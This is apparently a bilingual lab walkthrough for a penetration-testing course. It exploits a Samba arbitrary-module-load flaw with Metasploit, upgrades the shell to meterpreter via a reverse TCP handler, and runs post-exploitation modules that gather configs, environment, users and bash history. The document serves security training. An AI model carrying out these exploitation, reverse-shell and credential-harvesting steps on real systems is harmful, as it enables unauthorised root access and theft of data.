Linux Post Exploitation Modules
The MSF provides us with various post exploitation modules for both Windows and Linux.
We can utilize these post exploitation modules to enumerate information about the Linux system we currently have access to:
- Enumerate system configuration
- Enumerate environment variables
- Enumerate network configuration
- VM check
- Enumerate user history
Linux 后利用模块
MSF 为我们提供了适用于 Windows 和 Linux 的各种后期利用模块。
我们可以利用这些后期利用模块来枚举我们当前可以访问的 Linux 系统的信息:
- 枚举系统配置
- 枚举环境变量
- 枚举网络配置
- 虚拟机检查
- 枚举用户历史
Demo: Linux Post Exploitation Modules(演示:Linux 后利用模块)
1
2
ifconfig
eth1: 192.112.165.2
1
2
3
4
service postgresql start && msfconsole -q
workspace -a Linux_PE
setg RHOSTS 192.112.165.3
db_nmap -sV 192.112.165.3
We have SMB running on the Linux target. We’ve explored how to exploit Samba. We don’t need to change the payload. It’ll probably give us a command shell session. We can upgrade that to a meterpreter session in a few seconds.
1
2
3
4
search type:exploit samba
use exploit/linux/samba/is_known_pipename
show options
exploit
Samba is_known_pipename() Arbitrary Module Load
This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.
Samba is_known_pipename() 任意模块加载
此模块在 Samba 版本 3.5.0 到 4.4.14、4.5.10 和 4.6.4 中触发任意共享库加载漏洞。此模块需要有效的凭据、可访问共享中的可写文件夹以及可写文件夹的服务器端路径知识。在某些情况下,匿名访问与常见文件系统位置相结合可用于自动利用此漏洞。
We get a command shell session.
1
pwd # Print our working directory.
Put this in the background using the Ctrl+z keyboard combination.
List out the sessions.
1
sessions
That is a command shell session. We want to upgrade this to a meterpreter session.
-u: to upgrade. And we specify the session id, which is 1.
1
2
sessions -u 1
sessions
We have a meterpreter session on the target.
1
sessions 2
Firstly, start off with some local enumeration using the meterpreter session as well as a native shell session on the target system.
1
meterpreter > sysinfo
Get our current user id or the current user that we have access to.
1
2
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
The user id is 0, which on Linux means that we are the root user.
That’s some basic enumeration with meterpreter.
We can perform most of the local enumeration on a Linux system by typing in shell to give us a native terminal on the system.
1
meterpreter > shell
In this case, we can spawn a bash session by typing in /bin/bash -i. So we get a bash session.
1
2
/bin/bash -i
root@victim-1:/tmp#
We have root privileges. In this case, we don’t need to elevate our privileges.
whoami: Identify the user that you currently have access to.
1
root@victim-1:/tmp# whoami
List out the other user accounts on the system.
1
root@victim-1:/tmp# cat /etc/passwd
In terms of user accounts, we have only the root user. The rest of them look like service accounts with no home directory. So the service accounts are primarily used to manage services like the web server, for www-data, etc.
That’s how to enumerate the users on the Linux system.
Find out what groups your current user is a part of by typing groups and then the name of the user.
1
root@victim-1:/tmp# groups root
The user root is part of the root group, which makes sense because the root group is used to assign administrative privileges to members of that group.
Enumerate the distribution release version.
1
root@victim-1:/tmp# cat /etc/*issue
Get the kernel version,
1
root@victim-1:/tmp# uname -r
Get additional information, like the host name, the kernel version, the architecture.
1
root@victim-1:/tmp# uname -a
Perform some network enumeration.
1
2
root@victim-1:/tmp# ifconfig
root@victim-1:/tmp# ip a s
That will list out all the interfaces on the target system. This is the primary network interface here. That’s Ethernet 0, you can get the subnet here if you’re performing pivoting.
List out the various services that are currently listening on open ports.
1
root@victim-1:/tmp# netstat -antp
List all the processes on the system.
1
root@victim-1:/tmp# ps aux
These are all the processes on the system.
Enumerate the environment variables by typing in env for this particular user.
1
root@victim-1:/tmp# env
These are all the environment variables for the root user. It tells us the path that it will use to look for binaries, in this case.
That’s some local enumeration within a Linux terminal.
Let’s take a look at the various Linux post exploitation modules that we can use.
Terminate this channel.
1
root@victim-1:/tmp# ^C
The meterpreter session closed here for some reason. I’m going to upgrade our session once agin to get another meterpreter session.
1
2
sessions -u 1
sessions
We get another meterpreter session. Now it is the session 3.
Let’s explore the various Linux post exploitation module that we can use.
This module collects configuration files found on commonly installed applications and services, such as Apache, MySQL, Samba, Sendmail, etc. If a config file is found in its default path, the module will assume that is the file we want.
Linux 收集配置
该模块收集在常见安装的应用程序和服务中找到的配置文件,例如 Apache、MySQL、Samba、Sendmail 等。如果在其默认路径中找到配置文件,该模块将假定这就是我们想要的文件。
This is a Linux post exploitation module. And this will gather all the Linux configurations.
1
2
3
4
5
search enum_configs
use post/linux/gather/enum_configs
show options
set SESSION 3
run
If it fails, that means that configuration file probably doesn’t exist. And it then provides you with the directory under where you can find this information.
If you’re utilizing the Metasploit Framework database within your workspace, you can type in loot. And that will tell you where all of this information is saved.
1
loot
If I wanted to identify the shells that are currently on the system, I can copy the path to the file.
1
cat /root/.msf4/loot/20211126230647_Linux_PE_192.112.165.3_linux.enum.conf_788071.txt
These are the shells on the system.
That’s one of the great things about the Metasploit Framework database and workspaces is that it allows you to save your data. And all of this data will remain even after you shut down your msfconsole session.
That is how to gather or enumerate the configuration files from a Linux system.
Let’s take a look at the Environment Variable Module.
Multi Gather Generic Operating System Environment Settings
This module prints out the operating system environment variables.
Multi Gather 通用操作系统环境设置
该模块打印出操作系统环境变量。
It will gather the operating system environment variables.
1
2
3
4
5
search env platform:linux
use post/multi/gather/env
show options
set SESSION 3
run
Because we couldn’t enumerate the network information, we can utilize a module to automate that for us.
That’s used to gather network information.
Linux Gather Network Information
This module gathers network information from the target system IPTables rules, interfaces, wireless information, open and listening ports, active network connections, DNS information and SSH information.
Linux 收集网络信息
该模块从目标系统 IPTables 规则、接口、无线信息、打开和侦听端口、活动网络连接、DNS 信息和 SSH 信息中收集网络信息。
1
2
3
4
5
6
search enum_network
use post/linux/gather/enum_network
show options
set SESSION 3
run
loot
Let’s try the DNS configuration.
1
cat /root/.msf4/loot/20211126230923_Linux_PE_192.112.165.3_linux.enum.netwo_033792.txt
The primary DNS server is members.linode.com, which means that this particular target system is being hosted on Linode. We get the cloud service provider. As opposed to AWS, we now know it’s running on Linode.
Check for the various protection systems that have been put in place on the Linux system. When I’m referring to the protection systems, I’m simply referring to the various security features or modules that may have been enabled, like SELinux, iptables, etc.
Linux Gather Protection Enumeration
Linux Gather Protection Enumeration
This module checks whether popular system hardening mechanisms are in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also tries to find installed applications that can be used to hinder, prevent, or detect attacks, such as tripwire, snort, and apparmor. This module is meant to identify Linux Secure Modules (LSM) in addition to various antivirus, IDS/IPS, firewalls, sandboxes and other security related software.
Linux Gather 保护枚举
该模块检查流行的系统加固机制是否到位,例如 SMEP、SMAP、SELinux、PaX 和 grsecurity。它还会尝试查找可用于阻止、防止或检测攻击的已安装应用程序,例如 tripwire、snort 和 apparmor。除了各种防病毒、IDS/IPS、防火墙、沙箱和其他安全相关软件之外,该模块还用于识别 Linux 安全模块 (LSM)。
This is very important if you are trying to identify whether the system has been hardened or whether any system hardening mechanisms are in place.
1
2
3
4
5
search enum_protections
use post/linux/gather/enum_protection
info
set SESSION 3
run
All of this is going to be saved to your notes.
1
notes
That is where all your important notes will be stored in regards to information gathered from post exploitation modules. Whenever a module tells you that the information has been stored in notes, you can access that by typing in notes. And this is stored within the Metasploit Framework database.
Let’s take a look at some system enumeration. This performs or gathers system and user information.
enum_system
The enum_system module gathers system information. It collects installed packages, installed services, mount information, user list, user bash history and cron jobs
枚举系统
enum_system 模块收集系统信息。 它收集已安装的包、已安装的服务、安装信息、用户列表、用户 bash 历史和 cron 作业
1
2
3
4
5
6
search enum_system
use post/linux/gather/enum_system
show options
info
set SESSION 3
run
Take a look at the installed packages.
1
2
loot
cat /root/.msf4/loot/2021112631320_Linux_PE_192.112.165.3_linux.enum.syste_461525.txt
Take a look at the disk information here.
1
cat /root/.msf4/loot/2021112631320_Linux_PE_192.112.165.3_linux.enum.syste_797064.txt
That is how to enumerate or perform system enumeration.
We can also check whether we are currently a VM or a container. In many cases, a Linux target may be a container, a Docker container, or a Virtual Machine.
First and foremost, we can start off by checking whether this is a container.
If we are in a container, then we could possibly utilize that information to perform a container breakout, which is an advanced exploitation technique, but it is viable.
Linux Gather Container Detection
This module attempts to determine whether the system is running inside of a container and if so, which one. This module supports detection of Docker, LXC, and systemd nspawn.
Linux Gather容器检测
该模块尝试确定系统是否在容器内运行,如果是,是哪个容器。该模块支持检测 Docker、LXC 和 systemd nspawn。
1
2
3
4
5
search checkcontainer
use post/linux/gather/checkcontainer
show options
set SESSION 3
run
This appears to be a ‘Docker’ container. That’s very important, because there are many privilege escalation and container breakout exploits or techniques that you can utilize to break out of the container and gain access to the host system that is hosting the Docker containers. That can be very useful if you are staging further attacks on the system.
checkvm
The checkvm module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This module supports detection of Hyper-V, VMWare, VirtualBox, Xen, and QEMU/KVM.
检查虚拟机
checkvm模块尝试确定系统是否在虚拟环境中运行,如果是,是哪个。该模块支持对 Hyper-V、VMWare、VirtualBox、Xen 和 QEMU/KVM 的检测。
1
2
3
4
5
search checkvm
use post/linux/gather/checkvm
show options
set SESSION 3
run
Let’s take a look at how to enumerate the user’s history.
This will gather the user history for all the user accounts on the system.
enum_users_history
The enum_users_history module gathers user specific information. User list, bash history, mysql history, vim history, lastlog and sudoers.
枚举用户历史
enum_users_history 模块收集用户特定信息。 用户列表、bash 历史、mysql 历史、vim 历史、lastlog 和 sudoers。
1
2
3
4
5
search enum_users_history
use post/linux/gather/enum_users_history
show options
set SESSION 3
run
In this case, it’s going to try and get the bash history file or the history file for all these service accounts as well as the root account.
First of all, it gets the history file for the root account. The history file on Linux stores a list of command, or it just stores a log of commands that have been typed in by the user.
1
loot
bash history for root.
1
cat /root/.msf4/loot/20211126231657_Linux_PE_192.112.165.3_linux.enum.users_749147.txt
We can see what commands the root user typed in. These are all the commands that we typed in.
If the root user had typed in any commands previously, then we would see them here. Sometimes, users may paste in or type in passwords. And you can check the history file to identify those passwords in clear text. The history file just gives you a rundown of all the commands that have been typed in sequentially.
That’s how to enumerate the user account history. And in regards to the various post exploitation modules available for Linux, that’s pretty much it.
Post Exploitation Lab I(后期利用实验室 I)
Overview
In this lab, the target machine is running a vulnerable file sharing service. Exploit it and run the following post modules on the target:
在本实验中,目标机器正在运行易受攻击的文件共享服务。利用它并在目标上运行以下后期模块:
- post/linux/gather/enum_configs
- post/multi/gather/env
- post/linux/gather/enum_network
- post/linux/gather/enum_protections
- post/linux/gather/enum_system
- post/linux/gather/checkcontainer
- post/linux/gather/checkvm
- post/linux/gather/enum_users_history
- post/multi/manage/system_session
- post/linux/manage/download_exec
Instructions:
- This lab is dedicated to you! No other users are on this network
- Once you start the lab, you will have access to a root terminal of a Kali instance
- Your Kali has an interface with IP address 192.X.Y.Z. Run “ip addr” to know the values of X and Y.
- The target server should be located at the IP address 192.X.Y.3.
- Do not attack the gateway located at IP address 192.X.Y.1
- postgresql is not running by default so Metasploit may give you an error about this when starting
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-194.pdf
Multi Manage System Remote TCP Shell Session
post/multi/manage/system_session
This module will create a Reverse TCP Shell on the target system using the system’s own scripting environments installed on the target.
该模块将使用安装在目标系统上的系统自己的脚本环境在目标系统上创建一个反向 TCP Shell。
Linux Manage Download and Execute
post/linux/manage/download_exec
This module downloads and runs a file with bash. It first tries to uses curl as its HTTP client and then wget if it’s not found. Bash found in the PATH is used to execute the file.
Linux 管理下载和执行
该模块使用 bash 下载并运行一个文件。它首先尝试使用 curl 作为其 HTTP 客户端,如果找不到则使用 wget。在 PATH 中找到的 Bash 用于执行该文件。
复现视频内容
1
2
3
4
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.111.31.2 netmask 255.255.255.0 broadcast 192.111.31.255
ether 02:42:c0:6f:1f:02 txqueuelen 0 (Ethernet)
Target IP Address: 192.111.31.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@attackdefense:~# service postgresql start && msfconsole -q
[ ok ] Starting PostgreSQL 11 database server: main.
msf5 > workspace -a Linux_PE
[*] Added workspace: Linux_PE
[*] Workspace: Linux_PE
msf5 > setg RHOSTS 192.111.31.3
RHOSTS => 192.111.31.3
msf5 > db_nmap -sV 192.111.31.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-10 14:37 UTC
[*] Nmap: Nmap scan report for target-1 (192.111.31.3)
[*] Nmap: Host is up (0.0000090s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: MAC Address: 02:42:C0:6F:1F:03 (Unknown)
[*] Nmap: Service Info: Host: VICTIM-1
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.111.31.3 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.111.31.3 445 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
1
2
3
4
5
6
7
8
msf5 > search type:exploit samba
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
3 exploit/linux/samba/is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename() Arbitrary Module Load
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
Module options (exploit/linux/samba/is_known_pipename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.111.31.3 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMB_FOLDER no The directory to use within the writeable SMB share
SMB_SHARE_NAME no The name of the SMB share containing a writeable directory
Exploit target:
Id Name
-- ----
0 Automatic (Interact)
msf5 exploit(linux/samba/is_known_pipename) > exploit
[*] 192.111.31.3:445 - Using location \\192.111.31.3\exploitable\tmp for the path
[*] 192.111.31.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.111.31.3:445 - Share 'exploitable' has server-side path '/
[*] 192.111.31.3:445 - Uploaded payload to \\192.111.31.3\exploitable\tmp\lWygoEQH.so
[*] 192.111.31.3:445 - Loading the payload from server-side path /tmp/lWygoEQH.so using \\PIPE\/tmp/lWygoEQH.so...
[-] 192.111.31.3:445 - >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.111.31.3:445 - Loading the payload from server-side path /tmp/lWygoEQH.so using /tmp/lWygoEQH.so...
[+] 192.111.31.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (192.111.31.2:42931 -> 192.111.31.3:445) at 2023-03-10 14:41:46 +0000
pwd
/tmp
^Z
Background session 1? [y/N] y
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf5 exploit(linux/samba/is_known_pipename) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.111.31.2:33589 -> 192.111.31.3:445 (192.111.31.3)
msf5 exploit(linux/samba/is_known_pipename) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.111.31.2:4433
[*] Sending stage (985320 bytes) to 192.111.31.3
[*] Meterpreter session 2 opened (192.111.31.2:4433 -> 192.111.31.3:48926) at 2023-03-10 14:54:12 +0000
[*] Sending stage (985320 bytes) to 192.111.31.3
[*] Meterpreter session 3 opened (192.111.31.2:4433 -> 192.111.31.3:51520) at 2023-03-10 14:54:16 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 exploit(linux/samba/is_known_pipename) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.111.31.2:33589 -> 192.111.31.3:445 (192.111.31.3)
2 meterpreter x86/linux 192.111.31.2:4433 -> 192.111.31.3:48926 (192.111.31.3)
3 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.111.31.3 192.111.31.2:4433 -> 192.111.31.3:51520 (192.111.31.3)
1
2
3
4
5
6
7
8
9
10
11
msf5 exploit(linux/samba/is_known_pipename) > sessions 3
[*] Starting interaction with 3...
meterpreter > sysinfo
Computer : 192.111.31.3
OS : Debian 8.11 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
meterpreter > shell
Process 69 created.
Channel 1 created.
/bin/bash -i
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:/tmp# whoami
whoami
root
root@victim-1:/tmp# cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:107::/var/run/dbus:/bin/false
colord:x:105:112:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:106:113::/var/lib/saned:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
root@victim-1:/tmp# groups root
groups root
root : root
root@victim-1:/tmp# cat /etc/*issue
cat /etc/*issue
Debian GNU/Linux 8 \n \l
root@victim-1:/tmp# uname -r
uname -r
5.4.0-125-generic
root@victim-1:/tmp# uname -a
uname -a
Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 GNU/Linux
root@victim-1:/tmp# ifconfig
ifconfig
bash: ifconfig: command not found
root@victim-1:/tmp# ip a s
ip a s
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: ip_vti0@NONE: <NOARP> mtu 1480 qdisc noop state DOWN group default qlen 1000
link/ipip 0.0.0.0 brd 0.0.0.0
100896: eth0@if100897: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:c0:6f:1f:03 brd ff:ff:ff:ff:ff:ff
inet 192.111.31.3/24 brd 192.111.31.255 scope global eth0
valid_lft forever preferred_lft forever
root@victim-1:/tmp# netstat -antp
netstat -antp
bash: netstat: command not found
root@victim-1:/tmp# ps aux
ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 20044 2884 ? Ss 14:33 0:00 /bin/bash /root/start.sh
root 8 0.0 0.0 292840 14816 ? Ss 14:33 0:00 /usr/local/samba/sbin/smbd -D
root 9 0.0 0.0 47076 15560 ? S 14:33 0:00 /usr/bin/python /usr/bin/supervisord -n
root 10 0.0 0.0 292840 6684 ? S 14:33 0:00 /usr/local/samba/sbin/smbd -D
root 38 0.0 0.0 2128 1844 ? Sl 14:46 0:00 /tmp/CbMfD
root 53 0.0 0.0 4336 1564 ? S 14:52 0:00 /bin/sh
root 62 0.0 0.0 1148 1024 ? S 14:54 0:00 /tmp/rnqNo
root 69 0.0 0.0 4336 760 ? S 14:57 0:00 /bin/sh
root 71 0.0 0.0 20224 3288 ? S 14:58 0:00 /bin/bash -i
root 90 0.0 0.0 17504 2084 ? R 15:04 0:00 ps aux
root@victim-1:/tmp# env
env
USER=root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
PWD=/tmp
LANG=C
SHLVL=1
HOME=/root
_=/usr/bin/env
root@victim-1:/tmp# ^C
Terminate channel 1? [y/N] y
meterpreter >
[*] 192.111.31.3 - Meterpreter session 3 closed. Reason: Died
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf5 post(linux/gather/enum_configs) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.111.31.2:33589 -> 192.111.31.3:445 (192.111.31.3)
msf5 post(linux/gather/enum_configs) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.111.31.2:4433
[*] Sending stage (985320 bytes) to 192.111.31.3
[*] Meterpreter session 7 opened (192.111.31.2:4433 -> 192.111.31.3:60720) at 2023-03-10 15:15:46 +0000
[*] Sending stage (985320 bytes) to 192.111.31.3
[*] Meterpreter session 8 opened (192.111.31.2:4433 -> 192.111.31.3:60722) at 2023-03-10 15:15:49 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 post(linux/gather/enum_configs) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.111.31.2:33589 -> 192.111.31.3:445 (192.111.31.3)
7 meterpreter x86/linux 192.111.31.2:4433 -> 192.111.31.3:60720 (192.111.31.3)
8 meterpreter x86/linux 192.111.31.2:4433 -> 192.111.31.3:60722 (192.111.31.3)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
msf5 exploit(linux/samba/is_known_pipename) > search enum_configs
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 post/linux/gather/enum_configs normal No Linux Gather Configurations
msf5 exploit(linux/samba/is_known_pipename) > use post/linux/gather/enum_configs
msf5 post(linux/gather/enum_configs) > show options
Module options (post/linux/gather/enum_configs):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/enum_configs) > set SESSION 8
SESSION => 8
msf5 post(linux/gather/enum_configs) > run
[*] Running module against 192.111.31.3 [victim-1]
[*] Info:
[*] Debian GNU/Linux 8
[*] Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 GNU/Linux
[-] Failed to open file: /etc/apache2/apache2.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/apache2/ports.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/nginx/nginx.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/snort/snort.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/mysql/my.cnf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/ufw/ufw.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/ufw/sysctl.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/security.access.conf: core_channel_open: Operation failed: 1
[+] shells stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_298702.txt
[+] sepermit.conf stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_528778.txt
[+] ca-certificates.conf stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_551658.txt
[+] access.conf stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_794033.txt
[-] Failed to open file: /etc/gated.conf: core_channel_open: Operation failed: 1
[+] rpc stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_566992.txt
[-] Failed to open file: /etc/psad/psad.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/mysql/debian.cnf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/chkrootkit.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/logrotate.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/rkhunter.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/samba/smb.conf: core_channel_open: Operation failed: 1
[+] ldap.conf stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_240863.txt
[-] Failed to open file: /etc/openldap/openldap.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/cups/cups.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/opt/lampp/etc/httpd.conf: core_channel_open: Operation failed: 1
[+] sysctl.conf stored in /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_361315.txt
[-] Failed to open file: /etc/proxychains.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/cups/snmp.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/mail/sendmail.conf: core_channel_open: Operation failed: 1
[-] Failed to open file: /etc/snmp/snmp.conf: core_channel_open: Operation failed: 1
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
msf5 post(linux/gather/enum_configs) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.111.31.3 linux.enum.conf shells text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_298702.
txt
192.111.31.3 linux.enum.conf sepermit.conf text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_528778.
txt
192.111.31.3 linux.enum.conf ca-certificates.conf text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_551658.
txt
192.111.31.3 linux.enum.conf access.conf text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_794033.
txt
192.111.31.3 linux.enum.conf rpc text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_566992.
txt
192.111.31.3 linux.enum.conf ldap.conf text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_240863.
txt
192.111.31.3 linux.enum.conf sysctl.conf text/plain /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_361315.
txt
1
2
3
4
5
6
7
8
msf5 post(linux/gather/enum_configs) > cat /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_298702.txt
[*] exec: cat /root/.msf4/loot/20230310151618_Linux_PE_192.111.31.3_linux.enum.conf_298702.txt
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
1
2
3
4
5
6
7
msf5 post(linux/gather/enum_configs) > search env platform:linux
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
23 post/multi/gather/env normal No Multi Gather Generic Operating System Environment Settings
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 post(linux/gather/enum_configs) > use post/multi/gather/env
msf5 post(multi/gather/env) > show options
Module options (post/multi/gather/env):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(multi/gather/env) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.111.31.2:33589 -> 192.111.31.3:445 (192.111.31.3)
8 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ 192.111.31.3 192.111.31.2:4433 -> 192.111.31.3:60722 (192.111.31.3)
msf5 post(multi/gather/env) > set SESSION 8
SESSION => 8
msf5 post(multi/gather/env) > run
[*] Debian 8.11 (Linux 5.4.0-125-generic)
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
msf5 post(multi/gather/env) > search enum_network
Matching Modules
================
